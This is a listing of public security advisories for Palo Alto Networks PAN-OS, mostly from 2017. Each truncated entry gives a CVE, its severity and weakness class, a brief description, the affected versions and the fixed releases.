Paloalto PAN-OS vulnerabilities

CVE-2017-15940 [CRITICAL] CWE-77 Command Injection in PAN-OS Command Injection in PAN-OS A vulnerability exists in the PAN-OS web interface packet capture management that could allow an authenticated user to inject arbitrary commands. (Ref # PAN-81892 / CVE-2017-15940) PAN-OS contains a vulnerability that may allow for post authentication command injection This issue affects PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier, PAN-OS 8.0.6 and earlier Affected produ

CVE-2017-15942 [HIGH] CWE-399 Denial of Service Against GlobalProtect Denial of Service Against GlobalProtect A vulnerability exists in PAN-OS that could lead to denying access to GlobalProtect portal, GlobalProtect gateway or preventing configuration commits. (Ref # PAN-78127 / CVE-2017-15942) PAN-OS contains a vulnerability in GlobalProtect that may allow a non-authenticated third party to mount a Denial of Service attack against the GlobalProtect portal, GlobalProtect gateway or preventing c

CVE-2017-15943 [MEDIUM] CWE-918 Server-Side Request Forgery in PAN-OS Server-Side Request Forgery in PAN-OS A vulnerability exists in the PAN-OS web interface in the configuration file import for applications, spyware and vulnerability objects. Exploitation of this vulnerability allows for the parsing of external entities and could lead a PAN-OS device to connect to and disclose limited information to the attacker's server. (Ref # PAN-80452 / CVE-2017-15943) PAN-OS contains a vulnerability that

CVE-2017-9458 [CRITICAL] CWE-611 XML External Entity (XXE) in PAN-OS XML External Entity (XXE) in PAN-OS A vulnerability exists in PAN-OS’s GlobalProtect internal and external gateway interface that could allow for XML External Entity (XXE) attack. PAN-OS does not properly parse XML input. (Ref # PAN-75688 / CVE-2017-9458) Successful exploitation of this issue may allow disclosure of information, denial of service or server side request forgery. This issue affects PAN-OS 6.1.17 and earlier, PAN

CVE-2017-12416 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS Cross-Site Scripting in PAN-OS A vulnerability exists in PAN-OS’s GlobalProtect internal and external gateway interface. This issue could allow for a cross-site scripting (XSS) attack. PAN-OS does not properly validate specific request parameters. (Ref # PAN-76003 / CVE-2017-12416) Successful exploitation of this issue may allow an attacker to inject arbitrary Java script or HTML. This issue affects PAN-OS 6.1.17 and earlier, PAN-OS

CVE-2017-6460 [HIGH] CWE-119 NTP Vulnerability NTP Vulnerability The Network Time Protocol (NTP) library has been found to contain a vulnerability CVE-2017-6460. Palo Alto Networks software makes use of the vulnerable library and may be affected. This issue only affects the management plane of the firewall. (Ref # PAN-76130 / CVE-2017-6460) Successful exploitation of this issue requires an attacker to be on the management interface. This issue affects PAN-OS 6.1, PAN-OS 7.0.17 and earlier, PAN-

CVE-2017-8390 [CRITICAL] CWE-20 Vulnerability in the PAN-OS DNS Proxy Vulnerability in the PAN-OS DNS Proxy A Remote Code Execution vulnerability exists in the PAN-OS DNS Proxy. This issue affects customers who have DNS Proxy enabled in PAN-OS. This issue affects both the Data and Management planes of the firewall. When DNS Proxy processes a specially crafted fully qualified domain names (FQDN), it is possible to execute code on the firewall. (ref # PAN-77516 / CVE-2017-8390). Successful exploi

CVE-2017-9459 [MEDIUM] CWE-79 Cross-Site Scripting in the Management Web Interface Cross-Site Scripting in the Management Web Interface A reflected cross-site scripting (XSS) vulnerability exists in the management web interface. PAN-OS contains an unauthenticated vulnerability that may allow for a reflected cross-site scripting (XSS) attack of the management web interface. (ref # PAN-76455 / CVE-2017-9459). Successful exploitation of this issue may allow an attacker to inject arbitrary Java scr

CVE-2017-9467 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS Cross-Site Scripting in PAN-OS A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow for a cross-site scripting (XSS) attack. PAN-OS does not properly validate specific request parameters. (Ref # PAN-77294 / CVE-2017-9467) Successful exploitation of this issue may allow an attacker to inject arbitrary Java script or HTML. This issue affects PAN-OS 6.1.17 and earlier, PAN-OS 7.0.15 and earlier, PAN-OS 7

CVE-2016-10229 [CRITICAL] CWE-358 Kernel Vulnerability Kernel Vulnerability A vulnerability exists in the Linux kernel of PAN-OS that may result in Remote Code Execution. A vulnerability in the Linux kernel networking subsystem for UDP could enable an attacker to execute arbitrary code within the context of the kernel. The Data Plane (DP) of PAN-OS is not affected by this issue since it does not use the vulnerable Linux kernel code. (ref # PAN-77173 / CVE-2016-10229). Successful exploitation of

CVE-2016-8610 [HIGH] CWE-400 OpenSSL Vulnerability OpenSSL Vulnerability The OpenSSL library has been found to contain vulnerability CVE-2016-8610. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-68543 / CVE-2016-8610) The OpenSSL library in use by PAN-OS is patched on a regular basis. This issue affects PAN-OS 6.1.17 and earlier, PAN-OS 7.0.15 and earlier, PAN-OS 7.1.10 and earlier Affected products: PAN-OS Solution: PAN-OS 6.1.18 and later, PA

CVE-2016-4971 [HIGH] CWE-254 WGET Vulnerability WGET Vulnerability The wget library has been found to contain a vulnerability (CVE 2016-4971). wget allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-59677/ CVE 2016-4971) Successfully exploiting this issue would require an attacker to be authenticated on the Management Interface. This issue

CVE-2016-5696 [MEDIUM] CWE-200 Kernel Vulnerability Kernel Vulnerability A vulnerability exists in the kernel of PAN-OS that may result in Information Disclosure. The challenge ACK rate limiting in the kernel's networking subsystem may allow an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. (ref # PAN-62500 / CVE-2016-5696). Successful exploitation of

CVE-2017-7945 [CRITICAL] CWE-209 Brute force attack on the PAN-OS GlobalProtect external interface Brute force attack on the PAN-OS GlobalProtect external interface A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow for an attacker to brute force a username on PAN-OS GlobalProtect external Interface. The vulnerability is caused by PAN-OS provided different responses when supplying login credentials. (Ref # PAN-72769 / CVE-2017-7945) Successful exploitation of

CVE-2017-7644 [MEDIUM] CWE-200 Information Disclosure in the Management Web Interface Information Disclosure in the Management Web Interface A vulnerability exists in the Management Web Interface of PAN-OS, that could allow for Information Disclosure. The Management Web Interface does not properly validate certain permissions which could allow for Information Disclosure. (Ref # PAN-70541 / CVE-2017-7644) Successfully exploiting this issue would require an attacker to be authenticated. This issu

CVE-2017-3731 [HIGH] CWE-125 OpenSSL Vulnerability OpenSSL Vulnerability The OpenSSL library has been found to contain vulnerability CVE-2017-3731. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-73914 / CVE-2017-3731) The OpenSSL library in use by PAN-OS is patched on a regular basis. This issue affects PAN-OS 6.1, PAN-OS 7.0.14 and earlier, PAN-OS 7.1, PAN-OS 8.0 Affected products: PAN-OS Solution: PAN-OS 7.0.15 and later; PAN-OS 7.1.10 and l

CVE-2017-7409 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS Cross-Site Scripting in PAN-OS A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow for a cross-site scripting (XSS) attack. PAN-OS does not properly validate specific request parameters. (Ref # PAN-70674 / CVE-2017-7409) Successful exploitation of this issue may allow an attacker to inject arbitrary Javascript or HTML. This issue affects PAN-OS 7.0.14 and earlier Affected products: PAN-OS Solution:

CVE-2017-7218 [HIGH] CWE-20 Local Privilege Escalation in the Management Web Interface Local Privilege Escalation in the Management Web Interface A vulnerability exists in the Management Web Interface that could allow for local privilege escalation. The Management Web Interface does not properly validate specific request parameters which can potentially allow executing code with higher privileges. (Ref # PAN-70426/ CVE-2017-7218) Successfully exploiting this issue would require an attacker to b

CVE-2017-7217 [MEDIUM] CWE-20 Tampering of temporary export files in the Management Web Interface Tampering of temporary export files in the Management Web Interface A vulnerability exists in the Management Web Interface that could allow an attacker to tamper with export files. The Management Web Interface does not properly validate specific request parameters which can potentially allow arbitrary data to be written to export files. (Ref # PAN- 70436 / CVE-2017-7217) Successfully exploiting thi

CVE-2017-7216 [MEDIUM] CWE-200 Information Disclosure in the Management Web Interface Information Disclosure in the Management Web Interface A vulnerability exists in the Management Web Interface that could allow for Information Disclosure. The Management Web Interface does not properly validate specific request parameters which can potentially allow for Information Disclosure. (Ref # PAN-70434 / CVE-2017-7216) Successfully exploiting this issue would require an attacker to be authenticated. Th